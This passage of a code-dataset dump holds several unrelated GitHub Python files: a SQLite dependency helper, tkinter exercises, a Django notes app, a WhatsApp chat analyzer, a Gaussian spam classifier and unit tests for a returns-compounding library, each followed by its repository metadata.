depend_name, depend_bunch FROM depends\n WHERE name='{}'\n '''.format(name))\n row = c.fetchone()\n while row != None:\n depends.append((row[0], row[1]))\n row = c.fetchone()\n\n c.execute('''\n SELECT name FROM depends\n WHERE depend_name='{}'\n '''.format(name))\n row = c.fetchone()\n while row != None:\n items.append(row[0])\n row = c.fetchone()\n\n return item, depends, items\n","repo_name":"haozhigh/py_utilities","sub_path":"alchemy_helper/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":5020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5250281143","text":"# tkinter : GUI module\n\nfrom tkinter import *\n\nwindow = Tk() # window 창 생성 \ncanvas = Canvas(window, height = 1000, width = 1000, bg = 'white') # Window 창 안에 도화지 생성 \ncanvas.pack()\n\ncx = 1000//2 # Center X\ncy = 1000//2 # Center Y\nr = 400\n\ncanvas.create_oval(cx-r, cy-r, cx+r, cy+r, width =2, outline=\"red\")\n\nwindow.mainloop() # window 창 생성 -> loop라는 건 아마 OpenCV의 imshow 처럼 계속 띄워놓기 위함일 것 \n\n\n","repo_name":"dldnxks12/Algorithm","sub_path":"Algorithm/Recursive/Circle_tkinter.py","file_name":"Circle_tkinter.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1247588042","text":"def mirror_num(n):\n new_n = 0\n while n > 0:\n rem = n%10\n new_n = (new_n*10) + rem\n n = n//10\n return new_n\n\ndef beautifulDays(i, j, k):\n count = 0\n for day in range(i, j+1):\n if abs(day - mirror_num(day))%k == 0:\n count += 1\n else:\n continue\n return count \n\nif __name__ == \"__main__\":\n i = int(input())\n j = int(input())\n k = int(input())\n print(beautifulDays(i, j, k))","repo_name":"Somenath95/hackerrank_practice","sub_path":"ex_12_beautiful_day.py","file_name":"ex_12_beautiful_day.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16859336517","text":"from django.shortcuts import render,redirect\nfrom django.http import HttpResponse\nfrom .models import Note\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import UserCreationForm,NoteForm\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.contrib.auth import authenticate,login as loginUser,logout as logoutUser\n\n# Create your views here.\n\n@login_required(login_url='about')\ndef index(request):\n user = request.user\n notes = Note.objects.filter(user = user)\n\n context ={\"notes\":notes}\n return render(request,'notes/index.html',context)\n\n@login_required(login_url='login')\ndef add_note(request):\n user = request.user\n form = NoteForm()\n if request.method == 'POST':\n form = NoteForm(request.POST)\n if form.is_valid():\n note = form.save(commit=False)\n note.user = user\n note.save()\n return redirect('/')\n context ={\"form\":form}\n return render(request,'notes/add_note.html',context)\n\ndef login(request):\n if request.user.is_authenticated:\n return redirect('/')\n form = AuthenticationForm()\n if request.method == 'POST':\n form = AuthenticationForm(data=request.POST)\n if form.is_valid():\n username = form.cleaned_data.get('username')\n password = form.cleaned_data.get('password')\n user = authenticate(username=username, password=password)\n # print(user)\n if user is not None:\n loginUser(request, user)\n return redirect('/')\n else:\n messages.add_message(request,'Username or Password is 
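# Editor's note: worked check of the digit-reversal arithmetic in mirror_num
# above: peel the last digit with % 10 and shift the accumulator left with
# * 10; a "beautiful day" is one where |day - mirror| is divisible by k.
def mirror_num(n):
    new_n = 0
    while n > 0:
        new_n = new_n * 10 + n % 10
        n //= 10
    return new_n

assert mirror_num(1234) == 4321
assert mirror_num(120) == 21                 # leading zeros vanish, by design
assert abs(20 - mirror_num(20)) % 6 == 0     # |20 - 2| = 18, divisible by 6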
incorrect')\n # else:\n # form = AuthenticationForm()\n context = {\"form\":form}\n return render(request,'notes/login.html',context)\n\ndef signup(request):\n if request.user.is_authenticated:\n return redirect('/')\n form = UserCreationForm()\n if request.method == 'POST': \n # print(request.POST)\n form = UserCreationForm(request.POST)\n if form.is_valid():\n user = form.save()\n if user is not None:\n return redirect('login')\n context ={\"form\": form}\n return render(request,'notes/signup.html',context)\n\n@login_required(login_url='login')\ndef logout(request):\n logoutUser(request)\n return redirect('login')\n\n@login_required(login_url='login')\ndef edit_note(request,pk):\n note = Note.objects.get(id=pk)\n if note.user!=request.user:\n return redirect('access_error') \n form = NoteForm(instance=note)\n if request.method == 'POST':\n form = NoteForm(request.POST,instance=note)\n if form.is_valid():\n form.save()\n return redirect('/')\n context ={\"form\": form,\"note\":note}\n return render(request,'notes/edit_note.html',context)\n\n@login_required(login_url='login')\ndef delete_note(request,pk):\n note = Note.objects.get(id=pk)\n if note.user!=request.user:\n return redirect('access_error')\n if request.method == 'POST':\n note.delete()\n return redirect('/')\n context ={\"note\":note}\n return render(request,'notes/delete_note.html',context)\n\ndef about(request):\n return render(request,'notes/about.html')\n\ndef access_error(request):\n return render(request,'notes/no_access.html')","repo_name":"VishwasGajawada/Color_notes","sub_path":"notes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3350,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"5040167842","text":"from django.shortcuts import render\nfrom django.db import connection,transaction\n\n# Create your views here.\n\n\ndef index(request):\n return render(request,'facultyapp/index.html')\n\ndef home(request):\n with connection.cursor() as cursor:\n query1 = '''SELECT * FROM course;'''\n\n try:\n cursor.execute(query1)\n results = cursor.fetchall()\n rows = []\n columns = [each[0] for each in cursor.description]\n print(columns)\n for result in results:\n row = dict(zip(columns,result))\n rows.append(row)\n print(rows)\n return render(request,'departmentapp/home.html',{'results':rows})\n\n except Exception as e:\n print('Couldnt fetch data due to error ... '+ str(e))\n\n # query2 = '''SELECT * FROM academic WHERE staff_id='%s' '''%('9999')\n #\n # cursor.execute(query2)\n # results = cursor.fetchall()\n # print(results)\n # for result in results:\n # print(result==None)\n","repo_name":"dotel-saramsz/DepartmentDatabase","sub_path":"departmentapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"17759421205","text":"from urlextract import URLExtract\nfrom wordcloud import WordCloud\nfrom collections import Counter\nimport pandas as pd\nimport emoji\nextract = URLExtract()\ndef fetch_stats(selected_user,df):\n # 1. fetch number of messages\n # 2. 
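# Editor's note: hedged standalone version of the rows-to-dicts pattern used
# in departmentapp/views.py above. cursor.description names the columns, so
# zip() pairs them with each result tuple (sqlite3 here for self-containment;
# Django's raw connection cursor exposes the same .description attribute).
import sqlite3

conn = sqlite3.connect(':memory:')
cursor = conn.cursor()
cursor.execute('CREATE TABLE course (course_id INTEGER, title TEXT)')
cursor.execute("INSERT INTO course VALUES (1, 'Databases')")
cursor.execute('SELECT * FROM course')
columns = [each[0] for each in cursor.description]
rows = [dict(zip(columns, result)) for result in cursor.fetchall()]
print(rows)   # [{'course_id': 1, 'title': 'Databases'}]
conn.close()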
number of words\n if selected_user != \"Overall\":\n df = df[df['user'] == selected_user]\n\n num_messages = df.shape[0]\n words = []\n links = []\n for message in df['message']:\n words.extend(message.split())\n links.extend(extract.find_urls(message))\n\n num_media_messages = df[df['message'] == '<Media omitted>\\n'].shape[0]\n return num_messages, len(words), num_media_messages, len(links)\n\ndef fetchMostBusy(df):\n x = df['user'].value_counts().head()\n df = round(df['user'].value_counts()/df.shape[0]*100,2).reset_index().rename(columns={'user':'Name','count':'Percentage'})\n\n return x,df\n\ndef create_wordcloud(selected_user,df):\n if selected_user != 'Overall':\n df = df[df['user'] == selected_user]\n\n wc = WordCloud(width=500, height=500, min_font_size=10,background_color='white')\n df_wc = wc.generate(df['message'].str.cat(sep=\" \"))\n\n return df_wc\n\ndef mostCommonWord(selected_user,df):\n F = open('stop_hinglish.txt', 'r', encoding='utf-8')\n d = F.read()\n stop_words = []\n for word in d.split(\"\\n\"):\n stop_words.append(word)\n\n df = df[df['user'] != 'group_notification']\n df = df[df['message'] != '<Media omitted>\\n']\n\n if selected_user != 'Overall':\n df = df[df['user'] == selected_user]\n\n list = []\n\n for message in df['message']:\n for words in message.lower().split():\n if words not in stop_words:\n list.append(words)\n\n most_common_df = pd.DataFrame(Counter(list).most_common(20))\n\n return most_common_df\n\ndef emoji_helper(selected_user,df):\n if selected_user != 'Overall':\n df = df[df['user']==selected_user]\n emojis = []\n\n for message in df['message']:\n for word in message:\n if emoji.emoji_count(word):\n emojis.append(word)\n\n emoji_df = pd.DataFrame(Counter(emojis).most_common(len(emojis)))\n return emoji_df\n\ndef monthly_timeline(selected_user,df):\n if selected_user != 'Overall':\n df = df[df['user']==selected_user]\n timeline = df.groupby(['year', 'month']).count()['message'].reset_index()\n time = []\n for i in range(len(timeline)):\n time.append(timeline['month'][i] + \"-\" + str(timeline['year'][i]))\n\n timeline['time'] = time\n\n return timeline\ndef daily_timeline(selected_user,df):\n if selected_user != 'Overall':\n df = df[df['user'] == selected_user]\n df['only_date'] = df['date'].dt.date\n d_timeline = df.groupby(['only_date']).count()['message'].reset_index()\n\n return d_timeline\n\ndef weekly_activity_analysis(selected_user,df):\n if selected_user != 'Overall':\n df = df[df['user'] == selected_user]\n\n df['day_name'] = df['date'].dt.day_name()\n return df.groupby(['day_name']).count()['message'].reset_index()\n\ndef monthly_activity_analysis(selected_user,df):\n if selected_user != 'Overall':\n df = df[df['user'] == selected_user]\n\n return df.groupby(['month']).count()['message'].reset_index()\n\ndef activity_heatmap(selected_user,df):\n if selected_user != 'Overall':\n df = df[df['user'] == selected_user]\n\n user_heatmap = df.pivot_table(index='day_name',columns='period',values='message',aggfunc='count').fillna(0)\n\n return user_heatmap\n\n","repo_name":"Ayush-13-02/WhatsApp-Chat-Analyzer","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":3478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21408925379","text":"##\n## Generative Model\n##\nimport numpy as np\nfrom numpy import linalg\ndef pre_process():\n train_data = np.loadtxt('./data/spam_train.csv', delimiter=',', dtype=float)\n train_data = train_data[:,1:]\n x = 
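# Editor's note: restatement of the Counter step behind mostCommonWord above,
# with column names added for readability (the sample leaves them as the
# default 0 and 1).
from collections import Counter
import pandas as pd

tokens = ['ok', 'hi', 'hi', 'later', 'hi', 'ok']
most_common_df = pd.DataFrame(Counter(tokens).most_common(2),
                              columns=['word', 'count'])
print(most_common_df)
#   word  count
# 0   hi      3
# 1   ok      2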
train_data[:, :-1]\n y = train_data[:, -1]\n return x,y\n\ndef train(x, y):\n x = np.transpose(x)\n #数据总数\n num = y.shape[0]\n\n n1 = 0 # $==1\n n2 = 0 # $==0\n u1 = np.zeros(57).reshape(57,1)\n u2 = np.zeros(57).reshape(57,1)\n m1 = np.zeros(57 * 57).reshape(57, 57)\n m2 = np.zeros(57 * 57).reshape(57, 57)\n\n #计算n1 和 n2\n for i in range(num):\n if y[i] == 1:\n n1 += 1\n u1 += x[:,i].reshape(57,1)\n else:\n n2 += 1\n u2 += x[:,i].reshape(57,1)\n u1 /= n1\n u2 /= n2\n #计算sigma\n for i in range(num):\n if y[i] == 1:\n #np.tranpose() == x.T 求转置\n m1 += np.dot((x[:,i].reshape(57,1) - u1), (x[:,i].reshape(57,1) - u1).T)\n else:\n m2 += np.dot((x[:,i].reshape(57,1) - u2), (x[:,i].reshape(57,1) - u2).T)\n m1 /= n1\n m2 /= n2\n\n m = (m1 * (float(n1)/(n1 + n2)) + m2 * (float(n1)/(n1 + n2)))\n m_inv = linalg.inv(m)\n # print('n1=%d, n2=%d'%(n1, n2))\n # np.dot 与 np.matmul相似 均为矩阵乘法\n w = np.dot((u1 - u2).T, linalg.inv(m))\n b = - 0.5 * np.dot(np.dot(u1.T, m_inv), u1) \\\n + 0.5 * np.dot(np.dot(u2.T, m_inv), u2) + np.log(float(n1) / n2)\n\n return w,b\n\ndef sigmoid(z):\n return 1.0 / (1.0 + np.exp(-z))\n\ndef validate(w, b):\n acc = 0\n num = y_val.shape[0]\n result = np.zeros(num)\n z = np.dot(w, x_val.T) + b\n f = sigmoid(z)\n for i in range(num):\n result[i] = np.round(f[0,i])\n if result[i] == y_val[i]:\n acc += 1.0\n return acc / num\n\nx, y = pre_process()\nTRAIN_SIZE = 3600\nx_train = x[:TRAIN_SIZE, :]\ny_train = y[:TRAIN_SIZE]\nx_val = x[TRAIN_SIZE:, :]\ny_val = y[TRAIN_SIZE:]\nw,b = train(x_train, y_train)\nprint(validate(w, b))","repo_name":"YangLuYang/ML_hw","sub_path":"hw2_GM.py","file_name":"hw2_GM.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8972592851","text":"import unittest\nimport pandas as pd\nimport numpy as np\nfrom pystats.compounding import _get_cum_prod_to_last_date, \\\n _adjust_cum_prod_by_duration, _get_annualised_conts, get_compound_conts_to_pfo_annualised, \\\n remove_undefined_contributions\nfrom pystats.compounding import CompoundingTime\nfrom pystats.constants import TimePeriods as tp\nfrom unittest import mock\n\n\nclass TestCompounding(unittest.TestCase):\n def test_get_compounding_dates(self):\n date_1 = pd.datetime(2017, 12, 31)\n date_2 = pd.datetime(2016, 12, 31)\n date_3 = pd.datetime(2017, 5, 15)\n date_4 = pd.datetime(2017, 6, 30)\n date_5 = pd.datetime(2018, 1, 20)\n\n ct = CompoundingTime()\n ct_2 = CompoundingTime(optional_dates={tp.SCA_INCEPTION: date_4})\n\n res_1 = ct.get_compounding_dates(date_1, date_2)\n res_2 = ct.get_compounding_dates(date_3, date_2)\n res_3 = ct.get_compounding_dates(date_2, date_3)\n res_4 = ct.get_compounding_dates(date_2, date_2)\n res_5 = ct.get_compounding_dates(date_4, date_4)\n res_6 = ct_2.get_compounding_dates(date_1, date_2)\n res_7 = ct.get_compounding_dates(date_5, date_1)\n\n ans_1 = dict({tp.MONTH_TO_DATE: pd.Timestamp(2017, 12, 31),\n tp.QUARTER_TO_DATE: pd.Timestamp(2017, 10, 31),\n tp.YEAR_TO_DATE: pd.Timestamp(2017, 1, 31),\n tp.THREE_MONTHS: pd.Timestamp(2017, 10, 31),\n tp.TWELVE_MONTHS: pd.Timestamp(2017, 1, 31)})\n\n ans_2 = dict({tp.MONTH_TO_DATE: pd.Timestamp(2017, 5, 15),\n tp.QUARTER_TO_DATE: pd.Timestamp(2017, 4, 30),\n tp.YEAR_TO_DATE: pd.Timestamp(2017, 1, 31),\n tp.THREE_MONTHS: pd.Timestamp(2017, 3, 31)})\n\n ans_3 = dict()\n\n ans_4 = dict({tp.MONTH_TO_DATE: pd.Timestamp(2016, 12, 31)})\n\n ans_5 = dict({tp.MONTH_TO_DATE: pd.Timestamp(2017, 6, 30)})\n\n ans_6 = dict({tp.MONTH_TO_DATE: 
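# Editor's note: hedged vectorized restatement of train() above. With a
# shared covariance S, the class-1 posterior is sigmoid(w.x + b) with
#   w = (u1 - u2)^T S^-1
#   b = -1/2 u1^T S^-1 u1 + 1/2 u2^T S^-1 u2 + ln(n1/n2)
# Note the sample weights both per-class covariances by n1/(n1+n2); the usual
# pooled estimate weights m2 by n2/(n1+n2), as done here.
import numpy as np

def fit_shared_gaussian(x, y):
    x1, x2 = x[y == 1], x[y == 0]
    n1, n2 = len(x1), len(x2)
    u1, u2 = x1.mean(axis=0), x2.mean(axis=0)
    s = (n1 * np.cov(x1.T, bias=True) + n2 * np.cov(x2.T, bias=True)) / (n1 + n2)
    s_inv = np.linalg.inv(s)
    w = (u1 - u2) @ s_inv
    b = -0.5 * u1 @ s_inv @ u1 + 0.5 * u2 @ s_inv @ u2 + np.log(n1 / n2)
    return w, b

x = np.vstack([np.random.randn(50, 3) + 1.0, np.random.randn(50, 3)])
y = np.array([1] * 50 + [0] * 50)
w, b = fit_shared_gaussian(x, y)
print(w.shape, round(float(b), 3))   # (3,) and a scalar bias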
pd.Timestamp(2017, 12, 31),\n tp.QUARTER_TO_DATE: pd.Timestamp(2017, 10, 31),\n tp.YEAR_TO_DATE: pd.Timestamp(2017, 1, 31),\n tp.THREE_MONTHS: pd.Timestamp(2017, 10, 31),\n tp.TWELVE_MONTHS: pd.Timestamp(2017, 1, 31),\n tp.SCA_INCEPTION: pd.Timestamp(2017, 6, 30)})\n\n ans_7 = dict({tp.MONTH_TO_DATE: pd.Timestamp(2018, 1, 20),\n tp.QUARTER_TO_DATE: pd.Timestamp(2018, 1, 20),\n tp.YEAR_TO_DATE: pd.Timestamp(2018, 1, 20)})\n\n self.assertEqual(res_1, ans_1)\n self.assertEqual(res_2, ans_2)\n self.assertEqual(res_3, ans_3)\n self.assertEqual(res_4, ans_4)\n self.assertEqual(res_5, ans_5)\n self.assertEqual(res_6, ans_6)\n self.assertEqual(res_7, ans_7)\n\n def test_get_cum_prod_to_last_date(self):\n df_1 = pd.DataFrame(np.array([[1, 2, 3]] * 3).T)\n df_2 = pd.DataFrame(np.array([[1, 2, 3, 4]]))\n df_3 = pd.DataFrame(np.array([1, 2, 3, 4]).T)\n df_4 = pd.DataFrame(np.array([[1, 1], [1, 0]]))\n\n res_1 = _get_cum_prod_to_last_date(df_1)\n res_2 = _get_cum_prod_to_last_date(df_2)\n res_3 = _get_cum_prod_to_last_date(df_3)\n\n ans_1 = pd.DataFrame(np.array([[6, 3, 1]] * 3).T)\n ans_2 = pd.DataFrame(np.array([[1, 1, 1, 1]]))\n ans_3 = pd.DataFrame(np.array([24, 12, 4, 1]))\n\n np.testing.assert_array_equal(res_1, ans_1)\n np.testing.assert_array_equal(res_2, ans_2)\n np.testing.assert_array_equal(res_3, ans_3)\n\n self.assertRaises(ValueError, _get_cum_prod_to_last_date, df_4)\n\n def test_adjust_cum_prod_by_duration(self):\n start_date = pd.datetime(2017, 5, 31)\n mid_date = pd.datetime(2017, 12, 31)\n end_date = pd.datetime(2018, 4, 30)\n\n ct = CompoundingTime({tp.SCA_INCEPTION: pd.datetime(2017, 6, 30)})\n\n dates_1 = ct.get_compounding_dates(end_date, start_date)\n dates_2 = ct.get_compounding_dates(end_date, mid_date)\n dates_3 = ct.get_compounding_dates(mid_date, start_date)\n\n res_rng_1 = np.vstack(\n [[1.039046, 1.028758, 1.039150, 1.018774, 1.008687, 0.988909, 0.960106, 0.9797, 1.01, 1.01, 1.01, 1]] * 6).T\n res_rng_2 = res_rng_1[-5:, :4]\n res_rng_3 = res_rng_1[:8, :4] / 0.9797\n\n res_df_1 = pd.DataFrame(res_rng_1, columns=dates_1.keys(),\n index=pd.date_range(start=start_date, end=end_date, freq='M'))\n res_df_2 = pd.DataFrame(res_rng_2, columns=dates_2.keys(),\n index=pd.date_range(start=mid_date, end=end_date, freq='M'))\n res_df_3 = pd.DataFrame(res_rng_3, columns=dates_3.keys(),\n index=pd.date_range(start=start_date, end=mid_date, freq='M'))\n\n res_1 = _adjust_cum_prod_by_duration(res_df_1, dates_1)\n res_2 = _adjust_cum_prod_by_duration(res_df_2, dates_2)\n res_3 = _adjust_cum_prod_by_duration(res_df_3, dates_3)\n\n ans_rng_1 = np.array([[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1],\n [0, 0, 0, 0, 0, 0, 0, 0, 1.01, 1.01, 1.01, 1],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 1.01, 1.01, 1],\n [1.039046, 1.028758, 1.039150, 1.018774, 1.008687, 0.988909, 0.960106, 0.979700, 1.01,\n 1.01, 1.01, 1],\n [0, 1.028758, 1.039150, 1.018774, 1.008687, 0.988909, 0.960106, 0.979700, 1.01, 1.01,\n 1.01, 1]])\n\n ans_rng_2 = np.array([[0, 0, 0, 0, 1],\n [0, 0, 0, 0, 1],\n [0, 1.01, 1.01, 1.01, 1],\n [0, 0, 1.01, 1.01, 1]])\n\n ans_rng_3 = np.array([[0, 0, 0, 0, 0, 0, 0, 1],\n [0, 0, 0, 0, 0, 1.009400, 0.98, 1],\n [0, 0, 0, 0, 0, 1.009400, 0.98, 1],\n [0, 1.050075, 1.060682, 1.039884, 1.029588, 1.009400, 0.98, 1]])\n\n ans_1 = pd.DataFrame(ans_rng_1.T, columns=dates_1.keys(),\n index=pd.date_range(start=start_date, end=end_date, freq='M'))\n ans_2 = pd.DataFrame(ans_rng_2.T, columns=dates_2.keys(),\n index=pd.date_range(start=mid_date, end=end_date, freq='M'))\n ans_3 = 
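# Editor's note: the product-to-last-date behaviour tested above (e.g.
# [1, 2, 3, 4] -> [24, 12, 4, 1]) is a reversed cumulative product shifted by
# one slot: position i holds the product of the entries after i, with 1 in
# the final slot.
import numpy as np

a = np.array([1.0, 2.0, 3.0, 4.0])
res = np.append(np.cumprod(a[::-1])[::-1][1:], 1.0)
print(res)   # [24. 12.  4.  1.]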
pd.DataFrame(ans_rng_3.T, columns=dates_3.keys(),\n index=pd.date_range(start=start_date, end=mid_date, freq='M'))\n\n np.testing.assert_array_almost_equal(res_1, ans_1, decimal=6)\n np.testing.assert_array_almost_equal(res_2, ans_2, decimal=6)\n np.testing.assert_array_almost_equal(res_3, ans_3, decimal=6)\n\n def test_compound_contribution_to_portfolio(self):\n # set up portfolio with 5 month history of three assets,\n # where thesis_3 only enters the portfolio in the\n # third month\n\n start_date = pd.datetime(2017, 10, 31)\n end_date = pd.datetime(2018, 2, 15)\n dates = list(pd.date_range(start_date, end_date, freq='M'))\n dates.append(pd.datetime(2018, 2, 15))\n\n sca_inception_date = pd.datetime(2017, 12, 31)\n portfolio_inception_date = pd.datetime(2017, 10, 31)\n\n input_dict = {'thesis_1': [0.01] * 5,\n 'thesis_2': [0.01, -0.01, 0.01, 0.01, 0.01],\n 'thesis_3': [0, 0, 0.02, 0.02, 0.01]}\n\n input_df = pd.DataFrame(input_dict, index=dates)\n\n optional_dates = {tp.SCA_INCEPTION: sca_inception_date,\n tp.PORTFOLIO_INCEPTION: portfolio_inception_date}\n result = get_compound_conts_to_pfo_annualised(input_df, optional_dates, None)\n\n # set up expected result\n\n expected_index = ['thesis_1'] * 5 + ['thesis_2'] * 5 + ['thesis_3'] * 5\n\n expected_dict = {tp.DATE_NAME: dates[::-1] * 3,\n tp.MONTH_TO_DATE: [0.01] * 5 + [0.01, 0.01, 0.01, -0.01, 0.01] + [0.01, 0.02, 0.02, 0, 0],\n tp.QUARTER_TO_DATE: [0.0203, 0.01, 0.0308, 0.02, 0.01] + [0.0203, 0.01, 0.01, 0, 0.01] +\n [0.0306, 0.02, 0.02, 0, 0],\n tp.YEAR_TO_DATE: [0.0203, 0.01, None, None, None] + [0.0203, 0.01, None, None, None]\n + [0.0306, 0.02, None, None, None],\n tp.THREE_MONTHS: [0.03101, 0.03122, 0.0308, None, None] + [0.03101, 0.00958, 0.01, None, None]\n + [0.05202, 0.0408, 0.02, None, None],\n tp.SCA_INCEPTION: [0.03101, 0.0204, 0.01, None, None] + [0.03101, 0.0204, 0.01, None, None]\n + [0.05202, 0.0408, 0.02, None, None],\n tp.PORTFOLIO_INCEPTION: [0.05329, 0.04203, 0.0308, 0.02, 0.01] + [0.03101, 0.0204, 0.01, 0,\n 0.01] + [0.05202, 0.0408, 0.02, 0, 0]}\n\n expected_df = pd.DataFrame(expected_dict, index=expected_index)\n expected_df = expected_df[[tp.DATE_NAME, tp.THREE_MONTHS, tp.MONTH_TO_DATE, tp.PORTFOLIO_INCEPTION,\n tp.QUARTER_TO_DATE, tp.SCA_INCEPTION, tp.YEAR_TO_DATE]]\n\n # sort so that both in same order for comparison\n\n expected_df = expected_df.set_index(tp.DATE_NAME, append=True).sort_index(axis=0).reset_index(level=1)\n result = result.set_index(tp.DATE_NAME, append=True).sort_index(axis=0).reset_index(level=1)\n\n pd.testing.assert_frame_equal(expected_df, result, check_less_precise=True)\n\n def test_get_annualised_optional(self):\n # set up compounded returns from\n # end march 17 and annualise\n\n start_date = pd.datetime(2017, 1, 31)\n dates = pd.date_range(start_date, periods=18, freq='M')\n\n ct = CompoundingTime({'test_date': pd.datetime(2017, 3, 31)})\n\n test_dict = {tp.DATE_NAME: dates,\n 'test_date': [None] * 2 + [0.01 * s for s in range(1, 17)]}\n\n test_df = pd.DataFrame(test_dict)\n\n result = _get_annualised_conts(test_df, ct)\n\n expected_dict = {tp.DATE_NAME: dates,\n 'test_date': [None] * 2 + [0.01 * s for s in range(1, 13)]\n + [0.11943, 0.11886, 0.11830, 0.11775]}\n expected_df = pd.DataFrame(expected_dict)\n\n pd.testing.assert_frame_equal(result, expected_df, check_less_precise=4)\n\n def test_get_annualised_fixed(self):\n # set up a series of 3 year\n # returns which need to be annualised\n\n start_date = pd.datetime(2018, 1, 1)\n dates = pd.date_range(start_date, periods=5, 
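# Editor's note: the annualised figures in the optional-dates test above are
# consistent with the usual geometric scaling once the window passes twelve
# months: (1 + r) ** (12 / months) - 1.
r, months = 0.13, 13
print(round((1 + r) ** (12 / months) - 1, 5))   # 0.11943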
freq='M')\n\n ct = CompoundingTime()\n three_yr_ann = {'three yrs': 36}\n ct.get_fixed_annualisations = mock.MagicMock(return_value=three_yr_ann)\n\n test_dict = {tp.DATE_NAME: dates,\n 'three yrs': [None, 0.1, -0.08, -0.04, 0]}\n test_df = pd.DataFrame(test_dict)\n\n result = _get_annualised_conts(test_df, ct)\n\n expected_dict = {tp.DATE_NAME: dates,\n 'three yrs': [None, 0.03228, -0.02741, -0.013515, 0]}\n expected_df = pd.DataFrame(expected_dict)\n\n pd.testing.assert_frame_equal(result, expected_df, check_less_precise=4)\n\n def test_remove_undefined_contributions(self):\n # arrange\n\n test_dict = {\"Dates\": [pd.datetime(2018, 1, 31)] * 5 +\n [pd.datetime(2018, 2, 28)] * 5,\n \"Instrument\": [\"instr_\" + str(i) for i in range(5)] * 2,\n \"Performance\": [None, 0.02, None, 0.01, None] +\n [0, 0.01, 0.02, 0.01, 0.02]}\n test_df = pd.DataFrame(test_dict)\n\n expected_dict = {\"Dates\": [pd.datetime(2018, 1, 31)] * 2 +\n [pd.datetime(2018, 2, 28)] * 4,\n \"Instrument\": [\"instr_1\", \"instr_3\"] +\n [\"instr_1\", \"instr_2\", \"instr_3\", \"instr_4\"],\n \"Performance\": [0.02, 0.01] + [0.01, 0.02, 0.01, 0.02]}\n expected_df = pd.DataFrame(expected_dict)\n\n # act\n\n result = remove_undefined_contributions(test_df, \"Performance\")\n\n # assert\n\n expected_df = expected_df[result.columns] # reorder for comparison\n result = result.reset_index(drop=True) # reset index for comparison\n pd.testing.assert_frame_equal(expected_df, result)\n","repo_name":"jennyzzw240/sdk-pystats","sub_path":"tests/test_compounding.py","file_name":"test_compounding.py","file_ext":"py","file_size_in_byte":12490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19909099737","text":"from tkinter import Tk, Label, Button, Entry, END\n\nemployees = []\n\nclass Employee:\n\tdef __init__(self, empno, name, addr, hwage, hworked):\n\t\tself.empno = empno\n\t\tself.name = name\n\t\tself.addr = addr\n\t\tself.hwage = hwage\n\t\tself.hworked = hworked\n\n\tdef calc_salary(self):\n\t\tself.gpay = float(self.hwage) * float(self.hworked)\n\t\tself.netpay = self.gpay - self.gpay * 0.20 - self.gpay * 0.075\n\t\treturn self.netpay\n\nclass MyFirstGUI:\n\tdef __init__(self, master):\n\t\tself.cnt = 0\n\t\tself.master = master\n\t\tmaster.title(\"Fluff Shuffle Electronics\")\n\n\t\tself.lEmpNo = Label(master, text=\"Emp Number: \")\n\t\tself.txtEmpNo = Entry(master, validate=\"key\", text=\"Hello\")\n\t\tself.lName = Label(master, text=\"Name: \")\n\t\tself.txtName = Entry(master, validate=\"key\")\n\t\tself.lAddr = Label(master, text=\"Address: \")\n\t\tself.txtAddr = Entry(master, validate=\"key\")\n\t\tself.lhw = Label(master, text=\"Hourly Wage: \")\n\t\tself.txthw = Entry(master, validate=\"key\")\n\t\tself.lhwkd = Label(master, text=\"Hours Worked: \")\n\t\tself.txthwkd = Entry(master, validate=\"key\")\n\t\tself.lNetpay = Label(master, text=\"Net Pay: \")\n\t\tself.txtNetpay = Entry(master, validate=\"key\")\n\n\t\tself.btnNext = Button(master, text=\"Next Employee\", command=lambda: self.update(\"next\"))\n\t\tself.btnClose = Button(master, text=\"Close\", command=master.quit)\n\n\t\tself.lEmpNo.grid(row=0, column=0)\n\t\tself.txtEmpNo.grid(row=0, column=1)\n\t\tself.lName.grid(row=1, column=0)\n\t\tself.txtName.grid(row=1, column=1)\n\t\tself.lAddr.grid(row=2, column=0)\n\t\tself.txtAddr.grid(row=2, column=1)\n\t\tself.lhw.grid(row=3, column=0)\n\t\tself.txthw.grid(row=3, column=1)\n\t\tself.lhwkd.grid(row=4, column=0)\n\t\tself.txthwkd.grid(row=4, 
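# Editor's note: the fixed-annualisation test above stubs a method with a
# canned return value; a minimal standalone restatement of that MagicMock
# pattern (class name hypothetical):
from unittest import mock

class Annualiser:
    def get_fixed_annualisations(self):
        return {}

ct = Annualiser()
ct.get_fixed_annualisations = mock.MagicMock(return_value={'three yrs': 36})
print(ct.get_fixed_annualisations())    # {'three yrs': 36}
ct.get_fixed_annualisations.assert_called_once_with()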
